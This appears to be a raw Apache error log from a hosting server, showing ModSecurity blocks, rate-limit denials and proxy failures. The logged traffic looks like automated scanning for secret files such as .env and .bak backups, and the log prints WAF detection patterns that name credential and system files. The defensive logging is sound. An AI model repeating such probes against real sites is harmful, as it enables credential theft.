[Tue May 26 19:54:32.428935 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JQgAAAZg"]
[Tue May 26 19:54:32.430694 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszREAAAADk"]
[Tue May 26 19:54:32.431691 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRDwAAAHU"]
[Tue May 26 19:54:32.433953 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRHAAAADE"]
[Tue May 26 19:54:32.439664 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JRAAAAek"]
[Tue May 26 19:54:32.445234 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JRgAAAZI"]
[Tue May 26 19:54:32.445532 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JOwAAAbE"]
[Tue May 26 19:54:32.449007 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JQQAAAdI"]
[Tue May 26 19:54:32.454579 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH0qK9k_ZUB2Vp25JRQAAAdE"]
[Tue May 26 19:54:32.463511 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtH2DRMqfxdEDkoszRGwAAAB0"]
[Tue May 26 19:54:32.482679 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/redis.php.bak"] [unique_id "ahWtIFZMwN0DpLVWo6LAJQAAAL4"]
[Tue May 26 19:54:32.649279 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAXQAAAJ8
[Tue May 26 19:54:32.649979 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAXwAAAIk
[Tue May 26 19:54:32.650588 2026] [security2:error] [pid 86490:tid 86650] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/dynamodb/.env"] [unique_id "ahWtIFZMwN0DpLVWo6LAXAAAAKM"]
[Tue May 26 19:54:32.650773 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAYAAAAOg
[Tue May 26 19:54:32.650959 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAYQAAAL8
[Tue May 26 19:54:32.668977 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIGDRMqfxdEDkoszRTQAAAA8
[Tue May 26 19:54:32.670589 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIGDRMqfxdEDkoszRTgAAADA
[Tue May 26 19:54:32.670793 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIGDRMqfxdEDkoszRTwAAABA
[Tue May 26 19:54:32.671074 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtIEqK9k_ZUB2Vp25JYAAAAak
[Tue May 26 19:54:32.671101 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtIFZMwN0DpLVWo6LAYgAAAOA
[Tue May 26 19:54:32.801297 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAZQAAAIo
[Tue May 26 19:54:32.801864 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAZgAAAJA
[Tue May 26 19:54:32.804434 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAZwAAAMQ
[Tue May 26 19:54:32.827410 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAaQAAAIk
[Tue May 26 19:54:32.827553 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAagAAAKM
[Tue May 26 19:54:32.831056 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAawAAAOg
[Tue May 26 19:54:32.832263 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAbAAAAL8
[Tue May 26 19:54:32.832266 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAbQAAAQM
[Tue May 26 19:54:32.834006 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAbgAAAL4
[Tue May 26 19:54:32.875441 2026] [proxy:error] [pid 86490:tid 86627] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.875502 2026] [proxy_http:error] [pid 86490:tid 86627] [client 142.248.80.176:25316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.876108 2026] [proxy:error] [pid 86490:tid 86627] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.876148 2026] [proxy_http:error] [pid 86490:tid 86627] [client 142.248.80.176:25316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.877352 2026] [proxy:error] [pid 86490:tid 86711] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.877456 2026] [proxy_http:error] [pid 86490:tid 86711] [client 142.248.80.176:25378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.878122 2026] [proxy:error] [pid 86490:tid 86711] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.878209 2026] [proxy_http:error] [pid 86490:tid 86711] [client 142.248.80.176:25378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.878795 2026] [proxy:error] [pid 86490:tid 86622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.878867 2026] [proxy_http:error] [pid 86490:tid 86622] [client 142.248.80.176:25478] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.879436 2026] [proxy:error] [pid 86490:tid 86622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.879467 2026] [proxy_http:error] [pid 86490:tid 86622] [client 142.248.80.176:25478] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.897963 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIEqK9k_ZUB2Vp25JZAAAAe8
[Tue May 26 19:54:32.953464 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAcgAAAPk
[Tue May 26 19:54:32.957669 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAcwAAANo
[Tue May 26 19:54:32.959473 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAdAAAALw
[Tue May 26 19:54:32.969508 2026] [proxy:error] [pid 86490:tid 86723] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.969528 2026] [proxy:error] [pid 93576:tid 93796] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.969556 2026] [proxy_http:error] [pid 86490:tid 86723] [client 142.248.80.176:25452] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.969583 2026] [proxy_http:error] [pid 93576:tid 93796] [client 142.248.80.176:25466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.969792 2026] [proxy:error] [pid 86490:tid 86625] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.969858 2026] [proxy_http:error] [pid 86490:tid 86625] [client 142.248.80.176:25426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.970183 2026] [proxy:error] [pid 93576:tid 93796] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.970186 2026] [proxy:error] [pid 86490:tid 86723] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.970217 2026] [proxy_http:error] [pid 93576:tid 93796] [client 142.248.80.176:25466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.970220 2026] [proxy_http:error] [pid 86490:tid 86723] [client 142.248.80.176:25452] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.970472 2026] [proxy:error] [pid 86490:tid 86625] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.970505 2026] [proxy_http:error] [pid 86490:tid 86625] [client 142.248.80.176:25426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.972596 2026] [security2:error] [pid 93868:tid 94308] [client 142.248.80.176:25268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/backend/.env"] [unique_id "ahWtIEqK9k_ZUB2Vp25JZwAAAcE"]
[Tue May 26 19:54:32.972681 2026] [security2:error] [pid 93868:tid 94274] [client 142.248.80.176:25256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/app/.env"] [unique_id "ahWtIEqK9k_ZUB2Vp25JaAAAAZ8"]
[Tue May 26 19:54:32.972909 2026] [proxy:error] [pid 93868:tid 94369] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.972975 2026] [proxy_http:error] [pid 93868:tid 94369] [client 142.248.80.176:25412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.973483 2026] [proxy:error] [pid 93868:tid 94277] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.973529 2026] [proxy_http:error] [pid 93868:tid 94277] [client 142.248.80.176:25232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.973564 2026] [proxy:error] [pid 86490:tid 86683] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.973616 2026] [proxy_http:error] [pid 86490:tid 86683] [client 142.248.80.176:25438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.973787 2026] [proxy:error] [pid 93868:tid 94369] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.973833 2026] [proxy_http:error] [pid 93868:tid 94369] [client 142.248.80.176:25412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.974130 2026] [proxy:error] [pid 93868:tid 94277] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.974163 2026] [proxy_http:error] [pid 93868:tid 94277] [client 142.248.80.176:25232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.974526 2026] [proxy:error] [pid 86490:tid 86683] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.974586 2026] [proxy_http:error] [pid 86490:tid 86683] [client 142.248.80.176:25438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.974764 2026] [security2:error] [pid 93576:tid 93810] [client 142.248.80.176:25222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWtIGDRMqfxdEDkoszRWQAAAGI"]
[Tue May 26 19:54:32.974904 2026] [proxy:error] [pid 93576:tid 93732] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.974965 2026] [proxy_http:error] [pid 93576:tid 93732] [client 142.248.80.176:25408] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.975334 2026] [proxy:error] [pid 93576:tid 93795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.975375 2026] [proxy_http:error] [pid 93576:tid 93795] [client 142.248.80.176:25324] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.975505 2026] [proxy:error] [pid 93576:tid 93780] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.975562 2026] [proxy_http:error] [pid 93576:tid 93780] [client 142.248.80.176:25390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.975716 2026] [proxy:error] [pid 93576:tid 93717] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.975760 2026] [proxy_http:error] [pid 93576:tid 93717] [client 142.248.80.176:25410] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976027 2026] [proxy:error] [pid 93576:tid 93828] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.976089 2026] [proxy_http:error] [pid 93576:tid 93828] [client 142.248.80.176:25374] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976172 2026] [proxy:error] [pid 93576:tid 93780] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.976219 2026] [proxy_http:error] [pid 93576:tid 93780] [client 142.248.80.176:25390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976341 2026] [proxy:error] [pid 93576:tid 93820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.976393 2026] [proxy_http:error] [pid 93576:tid 93820] [client 142.248.80.176:25302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976476 2026] [proxy:error] [pid 93576:tid 93795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.976511 2026] [proxy_http:error] [pid 93576:tid 93795] [client 142.248.80.176:25324] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976745 2026] [proxy:error] [pid 93576:tid 93781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.976789 2026] [proxy_http:error] [pid 93576:tid 93781] [client 142.248.80.176:25362] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.976954 2026] [proxy:error] [pid 93576:tid 93826] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.977031 2026] [proxy_http:error] [pid 93576:tid 93826] [client 142.248.80.176:25354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.977216 2026] [proxy:error] [pid 93576:tid 93792] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.977265 2026] [proxy_http:error] [pid 93576:tid 93792] [client 142.248.80.176:25296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.977357 2026] [proxy:error] [pid 93576:tid 93820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.977416 2026] [proxy_http:error] [pid 93576:tid 93820] [client 142.248.80.176:25302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.977512 2026] [proxy:error] [pid 93576:tid 93828] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.977671 2026] [proxy_http:error] [pid 93576:tid 93828] [client 142.248.80.176:25374] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.977963 2026] [proxy:error] [pid 93576:tid 93826] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.977996 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIFZMwN0DpLVWo6LAeAAAAOg
[Tue May 26 19:54:32.978038 2026] [proxy_http:error] [pid 93576:tid 93826] [client 142.248.80.176:25354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978180 2026] [proxy:error] [pid 93576:tid 93722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978217 2026] [proxy_http:error] [pid 93576:tid 93722] [client 142.248.80.176:25332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978317 2026] [proxy:error] [pid 93576:tid 93717] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978359 2026] [proxy_http:error] [pid 93576:tid 93717] [client 142.248.80.176:25410] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978471 2026] [proxy:error] [pid 93576:tid 93816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978499 2026] [security2:error] [pid 93576:tid 93824] [client 142.248.80.176:25262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/api/.env"] [unique_id "ahWtIGDRMqfxdEDkoszRZgAAAHA"]
[Tue May 26 19:54:32.978519 2026] [proxy_http:error] [pid 93576:tid 93816] [client 142.248.80.176:25240] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978610 2026] [proxy:error] [pid 93576:tid 93781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978695 2026] [proxy_http:error] [pid 93576:tid 93781] [client 142.248.80.176:25362] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978796 2026] [proxy:error] [pid 93576:tid 93724] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978836 2026] [proxy_http:error] [pid 93576:tid 93724] [client 142.248.80.176:25304] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.978937 2026] [proxy:error] [pid 93576:tid 93732] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.978980 2026] [proxy_http:error] [pid 93576:tid 93732] [client 142.248.80.176:25408] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979072 2026] [proxy:error] [pid 93576:tid 93792] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979115 2026] [proxy_http:error] [pid 93576:tid 93792] [client 142.248.80.176:25296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979195 2026] [proxy:error] [pid 93576:tid 93831] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979232 2026] [proxy_http:error] [pid 93576:tid 93831] [client 142.248.80.176:25344] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979317 2026] [proxy:error] [pid 93576:tid 93722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979353 2026] [proxy_http:error] [pid 93576:tid 93722] [client 142.248.80.176:25332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979441 2026] [proxy:error] [pid 93576:tid 93724] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979477 2026] [proxy_http:error] [pid 93576:tid 93724] [client 142.248.80.176:25304] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:32.979564 2026] [proxy:error] [pid 93576:tid 93816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:32.979616 2026] [proxy_http:error] [pid 93576:tid 93816] [client 142.248.80.176:25240] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
